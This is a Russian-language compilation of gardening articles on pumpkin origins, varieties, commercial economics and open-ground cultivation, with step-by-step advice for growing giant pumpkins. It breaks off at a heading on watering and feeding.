7 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Основы выращивания большой вкусной тыквы

Тыква: условия и правила выращивания

Хотя тыква и кажется нам очень родным и знакомым овощем, на самом деле она является выходцем из Центральной Америки. Экзотическое происхождение не помешало ей завоевать Европу и Азию так же, как это удалось и другим «американским гостям» — картофелю, томатам, кукурузе, подсолнечнику и т.д. Сегодня тыква является достаточно распространенной и очень важной сельскохозяйственной культурой для России.

Происхождение и характеристики тыквы

Строго научно тыква — это целый род травянистых растений, насчитывающий около 20 различных видов. В России, как и в Европе, под термином «тыква» в первую очередь подразумевается один вид — тыква обыкновенная. Именно о нем и пойдет речь далее.

Тыква — это однолетняя бахчевая культура, состоящая в родстве с арбузами, огурцами и дынями. При этом именно тыкве принадлежит рекорд по максимальной массе плода среди всех растений.

Родиной вида является территория современной Мексики. Ученые- археологи полагают, что в этом регионе тыкву выращивали как минимум 8 тыс. лет назад. Ещё до нашей эры растение распространилась далеко на север, заняв ареал, охватывающий значительную часть современного Запада США.

В Европу тыква попала в XVI веке на испанских кораблях. Благодаря высокой урожайности и способности хорошо храниться в течение всей зимы, овощ быстро обрел популярность по всей Европе, за считанные десятилетия добравшись даже в Россию. Этому способствовало еще и то, что для тыквы условия Европы оказались очень подходящими.

Вид обыкновенная тыква включает несколько подвидов, которые довольно заметно различаются между собой, в первую очередь, внешним видом и размерами плодов. Итак, выделяют следующие разновидности:

  • Собственно тыква. Плоды очень крупные, овальной или шаровидной формы. В зависимости от сорта цвет плодов может быть зеленым, желтовато-белым, желтым, оранжевым, или полосатым двуцветным (с участием пары из указанных цветов).
  • Кабачки. Плоды существенно меньших размеров, форма удлинённая овальная, часто немного изогнутая. Цвет темно-зеленый (их еще называют цуккини), светло-салатовый (вплоть до почти белого) или желтый.
  • Патиссоны. Плоды даже меньше, чем у кабачков. Цвет светло-салатовый вплоть до почти белого. Форма может заметно отличаться от сорта к сорту. Это либо приплюснутые тарелкообразные диски, либо колокольчатые плоды. Но все они имеют общий элемент — фестоны по периметру, благодаря которым плод формой напоминает раскрытый бутон цветка.

Плоды всех подвидов тыквы очень полезны и питательны, а потому идут в пищу и людям, и домашним животным. В мякоти содержится 3—11% сахара, 15—20% крахмала, а также большое количество витаминов (С, B1, B2, B5, Е, каротина), микроэлементов (медь, кобальт, цинк, калий, кальций, магний, железо), ферментов, клетчатки и белков. Семена тыквы содержат растительное масло (до 40%), фитостерины, витамины, аминокислоты.

Хозяйственное значение тыквы

Тыква — один из немногих овощей, которые могут храниться всю зиму в сыром необработанном виде. Именно за это ее качество тыкву очень ценили в доиндустриальную эпоху, когда длительное хранение свежих продуктов представляло очень трудную задачу. Но даже в эпоху холодильников тыква остается весьма и весьма востребованной.

Все три разновидности этого овоща в равной степени пригодны как в пищу человеку, так и на корм сельскохозяйственным животным. Собственно тыква людьми потребляется преимущественно в вареном виде (каши и супы). Также из нее делают повидла и джемы. Причем наиболее ценятся полностью созревшие плоды. В качестве легкого «снэка» также очень популярны жаренные тыквенные семечки, являющиеся неплохой альтернативой семечкам подсолнуха.

Кабачки и патиссоны наоборот потребляются в молодом возрасте, когда их мякоть и шкурка еще мягкие и нежные. Эти две разновидности тыквы редко используют в суп и кашу (хотя, в принципе тоже вполне можно); отдается предпочтение другим видам обработки: их жарят, тушат, запекают, маринуют и делают так называемую «кабачковую икру» — кашеобразную массу, которая хороша в качестве гарнира или замазки для бутербродов. Также молодые кабачки и патиссоны иногда используют в сыром виде для салатов.

Семена тыквы являются источником ценного растительного масла. Это не просто альтернатива традиционному подсолнечному или оливковому маслу, но и продукт, обладающий выраженными лечебно-профилактическими свойствами. Тыквенное масло улучшает состояние печени, крови, препятствует ожирению, выводит холестерин, помогает в борьбе с простатитом.

Трудно переоценить значимость тыквы в качестве кормовой культуры. В сыром и термически обработанном виде ею можно кормить почти всех домашних травоядных и всеядных животных. Дешевая и высокоурожайная тыква является отличным способом снизить себестоимость производства на скотоводческих фермах и в свиноводческих хозяйствах.

Наконец, тыква заняла важное место в культуре современной западной цивилизации. Примеров тому масса, начиная со знаменитой кареты-тыквы в сказке о Золушке и заканчивая популярным в Европе праздником Хэллоуин, одним из символов которого является этот овощ.

Сорта тыквы

Помимо деления тыквы обыкновенной на три подвида существует и классическое разделение на сорта, коих за последние века было выведено немало. Все существующие сорта тыквы относятся к одной из трех групп:

  • Декоративные. Отличаются необычной формой или насыщенным красивым цветом плодов. Эти плоды используются для украшения интерьеров и экстерьеров, особенно при нарочито деревенском стиле дизайна.
  • Кормовые. Характеризуются высокой урожайностью и большими размерами плодов, которые идут на корм сельскохозяйственным животным.
  • Столовые. Имеют более приятный вкус. Предназначены для употребления в пищу человеком.

Следует отметить, что данное деление достаточно условно, так как и кормовые, и столовые сорта тыквы могут давать очень красивые и выразительные плоды пригодные для дизайнерских целей. При этом Созревшие кормовые тыквы в большинстве случаев вполне пригодны в пищу человеку, а столовые сорта при неожиданно обильном урожае часто идут на корм скоту.

Коммерческое выращивание тыквы

Помимо того, что тыква обладает высочайшей урожайностью (до 30 тонн с гектара), она еще и является одним из немногих видов овощей, которые хорошо плодоносят не только в южных регионах, но даже на севере. Именно поэтому Россия стабильно входит в тройку мировых лидеров по валовому производству тыквы.

Ввиду вышесказанного, стоимость плодов тыквы на отечественном рынке достаточно мала. Сегодня ее продают в среднем по 10-15 руб/кг, что довольно мало. Даже если год выдался хороший и урожай в самом деле составил 30 тонн с гектара, то общая выручка при средней цене 12 руб/кг составит лишь 360 тыс. рублей. Если вычесть затраты на обработку поля и уборку урожая, не говоря уже о хранении и транспортировке покупателю, общая прибыль будет совсем невелика.

Главная проблема здесь заключается в том, что тыква собирается исключительно вручную. По этой причине в себестоимости готовой продукции оплата труда рабочих будет составлять самую значительную часть. Впрочем, при наличии достаточных финансовых ресурсов и возможности использовать большую площадь земли, этот вид бизнеса может приносить неплохой доход за счет своего масштаба.

Другое направление — выращивание кормовой тыквы для скота. Разумеется, стоимость кормовой тыквы еще меньше, чем столовой, поэтому выращивать ее имеет смысл лишь для использования в собственных животноводческих комплексах.

Отдельно следует рассказать про выращивания тыквы ради получения семян. Как уже было сказано, тыквенные семечки являются неплохой альтернативой для семян подсолнуха. Однако этот вид спроса не так уж и велик. Гораздо более крупным и платежеспособным покупателем являются европейские импортеры. Особенно велик спрос на тыквенную семечку в Австрии. Там из нее делают растительное масло, которое более популярно, чем подсолнечное или оливковое.

Средняя стоимость тыквенных семечек на закупке в Европе составляет около 3 евро за 1 кг. В неурожайные годы цены вырастают до 4-5 евро. С одного гектара можно собирать около 1,5 тонны семечек (после сушки получается около 700 кг). Таким образом, доход с гектара составит 2100 евро при условии прямых поставок европейским импортерам. Преимуществом данного бизнеса является то, что собирать урожай можно с помощью специального комбайна без использования ручного труда, а значит себестоимость производства намного ниже. Правда, мякоть собранных и переработанных тыкв после отделения семечек комбайн выбрасывает прямо на землю, поэтому дополнительно заработать на мякоти проблематично

Выращивание тыквы в домашних условиях

Тыква достаточно непритязательна к условиям произрастания, поэтому легко поддается культивированию даже неопытным огородникам-любителям. Требования к плодородности и механическому составу почвы невысоки. При этом взрослое окрепшее растение легко переносит краткосрочные засухи и совершенно не боится сорняков. Тем не менее, чтобы тыква в домашних условиях давала высокий урожай, предпочтительно соблюдать хотя бы элементарные правила обработки почвы, посадки и ухода.

Следует выбирать плодородную, дренированную супесчаную, или среднесуглинистую почву с низким показателем кислотности. Оптимальный тип удобрений — навоз (особенно конский) или компост. Категорически непригодны для тыквы сырые глинистые грунты.

Наиболее предпочтительными предшественниками для тыквы являются многолетние травы, пшеница после пара, кукуруза на силос, картофель, помидоры, капуста, лук, бобовые. Допустимы и любые другие культуры кроме бахчевых — огурцов, арбузов, дынь и т.п. Поскольку тыква хорошо переносит тень и при этом способна эффективно подавлять развитие сорняков, ее часто высаживают прямо в посевах кукурузы.

Тыква действительно способна расти и плодоносить даже в северных регионах, но там для нее следует отводить те участки огорода, которые хорошо прогреваются солнцем и по возможности защищены от холодных северных ветров. В более южных регионах под тыкву можно отводить неровные или бросовые затененные участки огорода.

Для нормального развития тыкве нужна хорошо взрыхленная почва, поэтому сажать ее на целине недопустимо. Землю нужно вспахать или вскопать.

В южных и средних широтах (до 55-ой параллели) тыкву можно высаживать в открытый грунт обычными семенами, хотя при желании можно использовать и рассадный метод. В более северных регионах, где весна наступает поздно, использование рассады обязательно. Оптимальное время для сева/посадки — когда почва на глубине 10 см прогреется до +14-15°С, а весенние заморозки уже закончатся.

Поскольку тыквы обладают большим вьющимся по земле стеблем и огромными плодами, сажать их нужно на большом расстоянии друг от друга. Кустовые сорта размещают не ближе 70 см друг от друга, среднестебельные — 140 см, длинно-стебельные — 180 см. Хотя новичку может показаться, что такое расстояние слишком велико и земля используется нерационально, увеличение густоты растений приведет к уменьшению массы плодов. Глубина сева 5—10 см.

Взрослые растения способны эффективно подавлять любые сорняки, но до тех пор, пока стебли тыквы как следует разрастутся, придется провести 2-3 прополки междурядий. Некоторые огородники практикуют прищипывание точек роста на стеблях тыквы, чтобы не допустить образования чрезмерного количества завязей, которые всё равно не успеют нормально вызреть.

При всей своей засухоустойчивости, тыква очень хорошо отзывается на полив и внесение удобрений. Это особенно важно в районах с бедной или сухой почвой. Чтобы предотвратить загнивание плодов в дождливое лето, под них можно подкладывать фанеру, шифер или керамическую плитку.

О том, что пришло время уборки урожая, подскажут усыхание и опробковение плодоножки. Но даже в том случае, если плоды не успели дозреть, их всё равно нужно убрать до наступления морозов.

Вы должны собирать тыкву своими руками, так как никакая механизация в этом деле невозможна. Созревшие плоды нужно убирать очень бережно, старясь не повредить внешний слой и сохранить плодоножку. Механически поврежденные и утратившие плодоножку, а также недозрелые плоды следует использовать сразу, так как они смогут храниться лишь несколько недель, вместо нескольких месяцев.

Как вырастить большую тыкву на даче в открытом грунте: пошаговая инструкция и секреты опытных агрономов

Крупные плоды разных сортов тыквы, зреющие на грядках, украсят собой даже самый заурядный дачный участок. Крупнейший в мире овощ, выращенный в обычных условиях, превысил отметку в 1000 кг. Большой размер плодов никак не влияет на их хранение, вкусовые качества и полезные свойства.

Зачастую мы не обращаем внимания на то, что растет у нас «под ногами». Известно, что тыква способствует снижению веса и лечит сосудистые патологии. Все о выращивании крупной тыквы читайте далее.

Выбор сорта

Как вырастить большую тыкву на даче в открытом грунте? Для этого, прежде всего, следует правильно подобрать сорт. Выбирая крупный сорт тыквы, люди чаще всего останавливают свой выбор на таких видах, как Большой Макс, Атлант или Титан. При правильном уходе некоторые плоды способны достигать 150 кг.

Особенности:

  1. Большой Макс дает зрелые плоды до 40 кг. Мякоть сладкая, кожура светло-оранжевого цвета, достаточно плотная, слегка бугристая. При комнатной температуре хранится до весны.
  2. Атлант – это позднеспелый сорт. Созревает за 110-130 дней от всходов. Лучше выращивать рассадным способом. Вес зрелого плода от 20 до 50 кг. Мякоть сочная и мягкая, оранжевого цвета. Плод имеет сегментную поверхность.
  3. Титан. Некоторым дачникам удавалось вырастить плоды этой тыквы весом в 150 кг. Чтобы овощ достиг таких размеров, выращивать его нужно на плодородной почве, оставляя на растении один плод. Для получения крупного плода сорт выращивают через рассаду.

Процесс выращивания крупной тыквы

Для посадки семян в грунт важно дождаться прогрева почвы до +10-12 °С. Температуру проверяют в 10 см верхнего слоя грунта. Если условие соблюдено, приступаем к дальнейшим работам.

Подготовка семян

Для выращивания крупной тыквы важно правильно выбрать семена и подготовить их к посеву. Эта процедура занимает немного времени, но в дальнейшем положительно влияет на размер и качество плодов.

Для хорошего урожая выбирают самые тяжелые семена. Правильно отбирать их не по размеру, а по весу. Для дружных всходов перед посадкой семена 2 часа прогревают при температуре 50-60 °С. Затем, для предотвращения грибковых заболеваний, на протяжении 12 часов их держат в слабом (1%) растворе марганцовки.

Чтобы росток пробился через твердую кожуру семечка, используют зольный раствор, для приготовления которого потребуется в 1 л кипятка размешать 2 ст. л. древесной золы. Затем сложенную в несколько слоев марлю смачивают раствором и заворачивают в нее семена на 12 часов.

После проведенных процедур семена готовы к проращиванию в домашних условиях. Некоторые их сеют сразу в грунт.

Подготовка почвы

После уборки почву разрыхляют, затем перекапывают на глубину 25-30 см. Весной участок рыхлят дважды – первый раз на глубину 15 см, второй раз перед посевом примерно на 7 см.

После предыдущей культуры почву рекомендуется взрыхлить вместе с внесением удобрений – перегноя или навоза (5 кг на 1 кв. м), также 10-20 г калийной соли и 25-30 г суперфосфата.

При осенней перекопке вносится больше навоза, но чтобы нитраты не накапливались в плодах, навоз лучше заменить торфокомпостом (7 кг на 1 кв. м). Кислые почвы известкуют. Чтобы не терялся азот, после перекопки по поверхности почвы рассыпают известь.

Если одновременно вносить калийные и фосфорные удобрения, урожай однозначно повысится. Калийные удобрения повышают устойчивость к заболеваниям, а фосфорные способствуют развитию корневой системы и созреванию плодов.

Посадка семенами и рассадой

Для начала на грядке размечаем посадочные лунки. В каждую выливаем 2-3 л подогретой до 50 °С воды, затем высаживаем по 2-3 семечка на глубину 4 см в суглинистую почву. На легких почвах увеличиваем ее на 3 см, расположив семена в виде треугольника с равноудаленными сторонами от центра лунки. Присыпаем землей и мульчируем перегноем или компостом.

Между рядами оставляем расстояние до двух метров, а между лунками — по одному метру, сажаем в шахматном порядке. Если ночи холодные, грядку укрываем пленкой. С появлением всходов (через 7 дней) убираем укрывной материал. Когда вырастут два настоящих листика, проводим прореживание, оставляя по два ростка в лунке.

На заметку. Когда проводите прореживание, не выдергивайте сеянец, а отрезайте его на уровне земли, чтобы не нарушить корневую систему соседних растений.

Рассаду тыквы высаживают при температуре почвы не менее 10 °С. Определяют ее с помощью любого бытового термометра, поместив его на 10 минут в грунт. Для сохранения почвенного тепла сеянцы укрывают черной пленкой, а перед самой высадкой проливают каждую лунку горячей водой в количестве 2-3 литров.

Уход за тыквой

Прищипку тыквы выполняют, когда на плетях появятся плоды 10 см в диаметре. Делают это так, чтобы над каждым плодом оставалось 4-6 листьев.

Для увеличения количества урожая проводят формирование кустов. На главной плети оставляют 2 тыквы, а на боковых – по одной.

До того, как появятся первые цветки, тыкву обильно поливают теплой водой, предварительно взрыхляя почву вокруг растений. Когда она зацветет, интенсивность полива снижают, чтобы плоды правильно сформировались.

Также следует произвести доопыление — это осуществляется мягкой кистью или аккуратным соприкосновением цветков.

Подкормку вносят 1 раз в 8-10 дней, чередуя органические удобрения с минеральными. Если на улице продолжительная пасмурная погода, листья опрыскивают раствором мочевины (1 ст. л. на 10 л воды). В период интенсивного созревания кусты посыпают древесной золой (1 стакан на растение).

Под тыкву подкладывают картон, чтобы не было контакта с сырой землей. Это предотвратит загнивание тыквы на грядке.

Болезни и вредители

Бактериоз тыквы может возникнуть из-за переувлажненной почвы в сочетании с резкими перепадами температур. Эта болезнь проявляется в виде небольших коричневых язв на плодах.

При первых признаках разведите 10 г медного купороса и 10 г извести в 10 л воды. Хорошо опрыскайте стебли тыквы и листья. При поражении одних листьев и плодов их обрывают и сжигают вдали от участка.

Белая гниль образуется от низкой температуры и повышенной влажности. Чаще всего она появляется в загущенной посадке. Болезнь проявляется на плодах белыми пятнами, которые со временем чернеют. Для профилактики обработайте всходы бордосской смесью, и тогда борьба с ними вам не грозит.

Корневая гниль возникает вследствие полива холодной, не отстоянной водой. При этом нижние листья желтеют, а стебли приобретают бурую окраску. Болезнь способна погубить все растение. При появлении первых признаков заболевания извлекаем верхний слой грунта, у корней шейки и подсыпаем свежую землю, песок, опилки или торф (для роста новых корней). Стебли, побеги и листья обрабатываем мелом, известью, золой или растолченным углем. Корневую шейку опрыскиваем 1% раствором «Фундазола».

Мучнистая роса появляется из-за редкого полива. Иногда образовывается от избыточной подкормки азотным удобрением. Эта болезнь покрывает листья белым налетом, затем они усыхают и опадают. Как только заметите первые признаки, сразу удалите пораженные места и сожгите их, а растения опрыскайте коллоидной серой (20 г на 10 л воды).

Самые опасные вредители – это бахчевая тля и паутинный клещ. Для исключения заражения тлей следует своевременно удалять сорняки. Если тля уже настигла, проводим опрыскивание мыльным раствором (200 г тертого мыла на 10 л воды) или 10% «Карбофосом» в пропорции 60 г на 10 л воды. Искоренить паутинного клеща поможет опрыскивание луковым настоем (200 г шелухи на 10 л воды) или 20% раствором «Хлорэтанола» (20 г на 10 л воды).

На заметку. В следующий раз выращивать тыкву на том же месте можно не ранее, чем через 7 лет.

Сбор урожая

Полное созревание тыквы узнают по плодоножке. Она становится твердой и сухой. Листья и плети начнут желтеть и отмирать – это говорит о том, что тыквы из растения забрали все питательные вещества и их пора собирать.

Период сбора по календарю зависит от особенностей каждого сорта и колеблется от конца августа до середины октября.

Тыкву аккуратно срезают ножом или секатором. Затем плоды чистят от грязи и обсушивают. Лучше сразу осмотреть каждый плод на наличие царапин и механических повреждений. Если они найдутся, тыква надолго не сохранится.

Урожай хранят в сухом прохладном месте, не допуская попадания прямых солнечных лучей, от одного до шести месяцев.

Секреты опытных агрономов

Мастера своего дела считают, что вырастить большую тыкву можно и без всяких нитратов. Главное – знать некоторые секреты:

  1. Овощу необходимо достаточное количество пространства для произрастания. Одной большой тыкве понадобится 1,5 кв. м.
  2. Не допускайте, чтобы грядка была в тени. Очень важно, чтобы произрастающему овощу было достаточно света.
  3. Окучивайте узлы влажным грунтом для стимуляции образования корешков. Для формирования крупного плода растению данного вида необходима более мощная корневая система, чем другим сортам.
  4. Когда на кустах начнут формироваться завязи, измеряйте их ежедневно. Эта мера необходима для определения самого большого плода. Как только обнаружите самую крупную завязь – оставляйте ее, а все остальные удаляйте. В противном случае большую тыкву вырастить не получится: куст, получая питательные вещества и влагу, будет равномерно распределять их на все произрастающие плоды.
  5. Формируем кусты по принципу ели. На растениях должно оставаться по одному стеблю. Боковые отростки, чтобы облегчить уход, рекомендуется расположить под прямым углом к основному. Как только на пару сантиметров отрастут стебли второго порядка, аккуратно удаляем их. Главный стебель после зарождения соцветия продолжит расти. Как только он дорастет до 4-6 метров в длину, его необходимо прищипнуть.
  6. Когда овощ достигнет большого размера, передвигайте его время от времени, чтобы плод не раздавил основной стебель. Плодоножка тыквы располагается под острым углом по отношению к «материнской пуповине». Тыква со временем будет увеличиваться, и если не менять ее положение, то она просто раздавит стебель. Ежедневное перемещение овоща на несколько сантиметров проводится до тех пор, пока плодоножка не будет расположена под прямым углом от основного стебля.
  7. После высадки рассады в открытый грунт поливать ее первые 3 недели необязательно. По истечении этого срока установите график регулярного внесения влаги в почву. На 1 кв. м грядки в день потребуется примерно 6-7 л воды. При этом влага вносится на всю площадь тыквенной грядки, независимо от расположения лунок. Мощная корневая система тыквы занимает не только площадь лунки, но и территорию всей грядки. Чтобы влаги растениям было достаточно, не жалейте воды.

Если почва нуждается в подкормке, то ее вносят трижды за сезон. Первый раз удобряют до цветения тыквы. Готовят самостоятельно в таких пропорциях:

  • калий – одна часть;
  • азот – одна часть;
  • фосфор – три части.

Второй раз удобрение вносят после появления завязей. Готовится оно следующим образом:

  • фосфор – одна часть;
  • калий – три части;
  • азот – три части.

Третью подкормку производят после удаления всех завязей на кусте, кроме потенциального крупного плода. Приготовление удобрения:

  • калий – четыре части;
  • азот – две части;
  • фосфор – одна часть.

Чтобы не пожечь корни, удобрение разбавляют водой с расчетом 200 г готовой смеси на ведро воды. На каждую лунку требуется до 5 л питательной жидкости.

Заключение

Огромные тыквы могут сделать ваш огород известным и будут использоваться не только в блюдах на столе, но и в качестве украшений на осенних праздниках. Чтобы получить большие плоды, опытные агрономы рекомендуют воспользоваться рассадным способом. Выращивание тыквы не представляет сложностей, важно лишь иметь большое желание и приложить немного усилий.

Как вырастить самую большую тыкву – полезные советы

Добавление статьи в новую подборку

Хотите осенью удивить всех соседей гигантской тыквой? Швейцарец Бенни Майер ошеломил всех, вырастив тыкву весом 1056 кг. Пока еще никто из простых смертных его не переплюнул, но ведь нет предела совершенству. А наши рекомендации помогут побить рекорд!

У каждого огородника – свои секреты выращивания тыквы огромных размеров, начиная от замачивания и проращивания семян и заканчивая защитой растения от солнечных лучшей. Но есть и общие рекомендации, которые позволят вам вырастить тыкву немаленьких размеров. Ну или хотя бы попробовать, вдруг у вас получится побить рекорд знаменитого швейцарца, да еще и денег на этом заработать?

А рекомендации по выращиванию огромных тыкв такие.

Шаг 1. Выберите правильный участок для тыквы

Нужно внимательно отнестись к выбору участка, на котором вы планируете выращивать тыкву. Грядку для нее обычно готовят еще с осени. Оптимальное место – защищенный от ветра участок, хорошо освещаемый солнцем. Размер будущей грядки примерно 6 × 6 м.

В центре грядки выкопайте углубление в форме квадрата размером 1,5 × 1,5 м. На дне его ровным слоем выложите субстрат из перегноя, который предварительно нужно смешать с опавшими листьями и огородными отходами. Все это присыпьте землей и слегка перекопайте. В результате у вас должна получиться «органическая» грядка 25 см в высоту, которую, после небольшого полива, можно спокойно оставить на зимовку. После того как снег сойдет, грядку накройте любым укрывным материалом, например, черной пленкой.

Шаг 2. Подготовьте семена тыквы к посеву

Конец апреля – самое подходящее время для подготовки тыквенных семян. Сначала опытные огородники проводят так называемую отбраковку с солью – погружают семечки в раствор соли (на 1 л воды 30 г соли). Этот способ помогает выбрать качественный посевной материал, ведь крепкие и здоровые семечки через 30 минут опустятся на дно, а пустые всплывут.

После этого «правильные» семечки нужно промыть под струей проточной воды и выдержать в растворе гумата калия, Циркона или Эпина на протяжении 5 часов. Можно также использовать раствор древесной золы (1 ст.л. золы на 1 л воды) – в таком растворе семена держат на час дольше.

После замачивания семена нужно прорастить. У каждого дачника есть свой наиболее удобный способ проращивания. Многие используют для этого марлю, бинт или даже бумагу. На дно предварительно подготовленной емкости (можно использовать неглубокие тарелки) кладут ткань, на нее – семена, затем все это снова накрывают тканью и хорошо увлажняют, чтобы ткань как следует пропиталась водой.

После этого емкость нужно накрыть пленкой или поместить в пакет – как кому удобнее. Пока семена прорастают, ваша задача – периодически проветривать их, приподнимая пленку, и проверять, не высохла ли ткань.

Некоторые огородники вместо влажной ткани используют мох, который периодически опрыскивают теплой водой.

Когда семена проклюнутся, и длина их корешков достигнет 1 см, можно высевать.

Шаг 3. Посейте семена тыквы в отдельные стаканчики

Не спешите с пересадкой пророщенных семян в открытый грунт, сначала лучше посейте их в горшочки для рассады. Для этого внутреннюю часть каждого горшочка выкладывают пленкой (края ее должны торчать снаружи), насыпают подготовленную почвосмесь, хорошенько поливают. Вода для полива должна быть теплой.

Почвосмесь для выращивания тыквы в домашних условиях можно приобрести в магазине, а можно приготовить самим. Для этого возьмите 2 кг торфа, 1 кг перегноя, 1 кг древесных опилок и 20 г нитроаммофоски. Оптимально для рассады тыквы использовать торфяные горшочки или таблетки.

После появления первых ростков тыкву нужно подкормить. Многие используют раствор азофоски (2-3 ст.л. на 10 л воды) или же раствор коровяка в пропорции 1:10 (на один росток тыквы – 0,2 л раствора).

Второй раз подкормите рассаду (тем же составом удобрений) за несколько дней до высадки в открытый грунт.

Шаг 4. Вовремя высадите рассаду тыквы в открытый грунт

Высаживать рассаду в открытый грунт начинают тогда, когда земля окончательно прогреется и станет понятно, что заморозки уже не вернутся. На грядке, предназначенной для выращивания тыквы, выкапывают лунки, глубина которых равна высоте горшочков, в которых находилась рассада. Лунки поливают раствором комплексного удобрения, строго выполняя требования, указанные на упаковке.

Рассаду легко вытаскивать из горшочков, потянув за края выступающей снаружи пленки.

Из всех сеянцев нужно выбрать самый крепкий, который и станет в итоге самой крупной по размеру тыквой. Этот сеянец будет расти на подготовленной заранее теплой грядке, о которой говорилось в самом начале.

Шаг 5. Правильно ухаживайте за тыквой

Самое главное на этом этапе для тыквы – своевременно и правильно сформировать плети, а также подкармливать и защищать растения от вредителей и мучнистой росы, которая часто поражает тыквы. В качестве подкормок используйте нитрофоску (10 г на один куст). Этот препарат обычно вносят в сухом виде, а затем поливают растения. После того как у тыквы появятся усы, схему подкормки немного измените: теперь понадобится уже 15 г нитрофоски, которую предварительно нужно развести водой в соответствии с инструкцией.

Можно также использовать золу – посыпать растения из расчета 1 стакан золы на куст. Некоторые огородники в начальном периоде роста подкармливают свои тыквы раствором из коровяка (1:8). Одного ведра такого раствора хватит, чтобы подкормить 5-6 кустов.

С мучнистой росой помогают бороться препараты Фундазол, Топаз или Скор – их используют строго по инструкции. Обычно достаточно провести обработку два раза в течение сезона.

Тыквенные побеги всегда тянутся к солнцу и могут раскидывать свои плети на 3-4 м в длину. Как правило, такие побеги могут похвастать многочисленными плодами, а это не очень хорошо: все плоды никак не успеют созреть до конца сезона. Поэтому лишнюю завязь следует оборвать, оставив пару хороших плодов.

Для того чтобы вырастить тыкву больших размеров, садоводы рекомендуют отпустить основную плеть тыквы на 7,5 м. После этого верхушку срезают и прикапывают. Следующие плети отпускают на 3-3,5 м, каждая последующая должна быть короче предыдущей на 1-1,5 м. Все плети, которые вырастают из пазух вторичных плетей, нужно обрезать.

После появления на основной плети третьего плода остальные завязи удаляют. Когда плоды тыквы своими размерами станут напоминать футбольные мячи, их тоже нужно срезать, оставив одну – самую качественную и ровную.

Очень важно защитить тыкву от солнца: ультрафиолетовые лучи способствуют затвердеванию кожуры, а это не позволяет тыкве расти дальше. У каждого огородника своей способ защиты тыквы – кто-то использует спанбонд, натягивая его на дуги, а кто-то – старый ненужный зонтик. Главное, чтобы это было удобно вам.

В жаркие дни поливать тыкву нужно под корень, осуществлять полив лучше в вечернее время. Для полива лучше использовать воду, которая предварительно отстоялась.

На что только ни идут дачники, чтобы вырастить самую большую тыкву! Но даже если вам это не удалось, расстраиваться не стоит: размер этого овоща совершенно не влияет на его вкус! К тому же, всегда есть возможность снова попытать счастья в выращивании тыквы-гиганта уже в следующем дачном сезоне.

Основы выращивания большой, вкусной тыквы

Редкий огородник не выращивает тыквы. Даже если человек по какой-то причине не употребляет в пищу этот полезный во всех отношениях продукт, то садит рядок — другой на корм домашним животным. Поговорим об особенностях выращивания тыквы в открытом грунте и рассадным способом.

Из статьи вы узнаете:

  • 1 посадка тывквы: почва и размещение
  • 2 Чтобы тыквы были большими
  • 3 Выращивание тыквы через рассаду
  • 4 Дальнейший уход за тыквой
  • 5 Полив и подкормка
  • 6 Формирование куста: прищипывание, пасынкование
  • 7 Еще рекомендуем почитать:

посадка тывквы: почва и размещение

Хотя тыква — наиболее холодоустойчива среди бахчевых овощей, она тоже любит тепло. Поэтому семена этой культуры нужно высаживать в конце апреля — в начале мая, когда почва прогреется и установится стойкая погода. Растет она практически на любой почве с достаточным количеством питательных веществ. Однако лучшими являются супесчаные, легкосуглинковые плодородные земли с нейтральной реакцией (только не засоленные или переувлажненные).

Выбирая участок, обязательно учитывайте предшествующие культуры. Лучшие из них — капуста, картофель, томаты, кормовые и столовые свеклы, зерновые и зернобобовые культуры, однолетние кормовые травы. Размещение после кабачков, патиссонов, огурцов недопустимо. Кстати, тыкву можно посадить там, где собран ранний урожай редиса, шпината, салата.

Соседями тыкв часто становятся картофель, кормовая свекла. Садят их и возле кукурузы, кустовой фасоли. В конце концов, неплохо чувствуют себя тыквы даже возле изгороди, ведь для них практически нет разницы между освещенными и затененными участками.

Чтобы тыквы были большими

Чтобы вырастить большие плоды, прежде всего отберите качественный репродуктивный материал. Целесообразнее использовать 3-летние семена. Предварительно их на протяжении 6-8 суток прогревают на солнце. Затем зернам следует прорасти: на сутки замочите их в воде комнатной температуры, а потом неделю держите в теплом месте. Высаживание проводят тогда, когда температура почвы на глубине 10 см будет в пределах + 13-14″С (если земля будет холоднее — семена загниют).

Эффективнее всего садить тыквы гнездовым методом, размещая растения на расстоянии 70-140 см (в зависимости от сорта). При малой площади питания плоды будут мелкими.

Выкопав ямку, внесите в нее 2-3 кг перегноя и стакан золы. Все это тщательно перемешайте с почвой. Если же земля сухая, в ямку предварительно нужно влить 1-2 л теплой воды. Затем вбросьте 3-5 семян (на расстоянии 3-4 см одно от другого). Глубина заворачивания — 5-6 см. Поверхность слегка уплотните и замульчуйте торфом или перегноем.

Сразу после появления первых всходов проводят неглубокое рыхление междурядий (на 5-6 см). Через 10-15 дней можно повторить процедуру, прорыхлив почву чуть глубже. Так вы притормозите сорняки и обеспечите обогащение почвы вокруг растений кислородом. В фазе первого настоящего листка посевы прореживают, оставляя 1-2 наиболее развитые растения.

Выращивание тыквы через рассаду

Практикуется и выращивание тыкв рассадным способом. Особенно это целесообразно в северных районах с коротким вегетационным периодом. В таком случае овощи получают возможность созреть. Также можете попробовать вырастить тыкву через рассаду, если хотите получить ее к столу как можно раньше.

Рассада тыкв плохо переносит пересаживание. Поэтому ее нужно выращивать без пикирования. Перед посевом заранее замоченные семена нужно выдержать во влажных опилках или песке, пока не появятся небольшие корешки. Затем по одному зернышку высаживайте в наполненные почвенной смесью горшки размером 8×8 см. Глубина посева — 2-3 см.

Выращивание тыквы через рассаду

В такой таре растения выращивают до появления 3-4 настоящих листочков. Увлажняйте только теплой водой, следя, чтобы не пересыхала земля. Через 18-20 дней рассада будет готова к “переселению” на огород, которое в холодных районах проводится в начале июня.

Высаживают рассаду на удобренный перегноем участок. Делать это лучше во время пасмурной погоды. Предварительно лунки щедро полейте. Важно, чтобы земля была плотно прижата к корням, иначе могут образоваться пустоты, которые будут препятствовать доступу воды к растению. Заметим, что рассаду размещают глубже, чем она росла в горшках (вплоть до семядольных листков). Тогда тыквы будут образовывать много дополнительных корней.

Дальнейший уход за тыквой

Тыква очень неприхотлива. Часто весь уход за ней огородники ограничивают посадкой, пуская полив и остальное на волю природы. При этом тыква в отличие от других бахчевых вполне неплохо растет. Но если уделить растению побольше внимания, она отблагодарит сторицей!

Основной уход за тыквой после посадки заключается в поливе, подкормке и, по желанию, в формировании куста. При выращивании кормовой тыквы формирование можно пропустить.

Полив и подкормка

